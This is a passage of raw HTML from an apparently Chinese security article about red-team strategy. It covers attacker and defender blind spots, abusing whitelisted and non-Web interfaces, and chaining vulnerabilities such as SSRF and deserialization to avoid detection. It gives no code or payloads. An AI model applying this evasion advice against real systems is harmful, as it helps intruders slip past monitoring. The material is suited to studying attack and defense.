&#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">预算有限，能省则省</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">攻击方寻找防守方的墨菲</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">移动端、逻辑漏洞、业务需要、责任划分（功能对接处）...</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">移动端，好多是由于“壳”强则强，破壳后不一定那么强</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">逻辑漏洞，具备一定的合理性，鉴黑逻辑并不是那么线性</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">③</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">有一些功能，安全部门没有扭过业务部门，被迫上线</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">④</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">多部门协同的衔接处往往是防守方可信且易忽略的</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">⑤</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">某功能，处于“三不管”地带</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">⑥</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">...</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(3)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">你体系的筑建千里之堤，我体系的寻找蚁穴（不一定是零和，也可以正和）</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">安全建设需要体系化，但搞破坏可能一个单点即可；攻防双方互相搞自己体系化；</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">如果攻击者站在自己是防守视角哪些容易忽视或者不得已的做法，以及防守方站在攻击方视角有哪些是监控盲区哪些害怕被攻击。本身攻防双方也是动态的，也可以正和。</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span><o:page></o:page></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></o:p></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4.</span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">Web渗透</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">  </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">  </span></h1><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">1. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">接口类攻击</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">寻找白名单接口</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">业务接口正常调用</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">虽然可以攻击，但功能是可信的也是业务需要的，进攻合理性</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">非标业务接口</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">目前实战中大部分还是Web相关协议</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">非Web类协议也是容易躲避鉴黑流的打法，且本身属于白逻辑</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">漏洞组合拳</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">前台后台漏洞组合拳</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">现在的审计漏洞挖掘难度也在提升，明显前台的RCE 不那么容易获得。</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">参考《漏洞组合拳》，路径长一些，就相对迂回一些，但打漏洞依然高风险容易暴漏，如果有的选择，比如https+反序列化、逻辑洞 相对白一些，例如SSRF本身就是获得了一个合法的边界权限，是由于自身功能导致，并不是攻击者从利用漏洞新造的权限，感知平台不一定那么精准的发现。</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">【我们不生产漏洞，我们只是大自然的搬运工】</span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">   </span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><img data-backh="190" class="rich_pages wxw-img" data-ratio="0.3851851851851852" data-w="1080" style="width: 100%;height: auto !important;" data-backw="494" src="https://wechat2rss.xlab.app/img-proxy/?k=857ad9e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLTs2RAMgQOGohbItgvWCOdIdu04WEU9S5PaWGYEYkopkGkzP7nuj2KjrjZdKB9ZOpb9kFEeyTA6Q%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;"></span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times 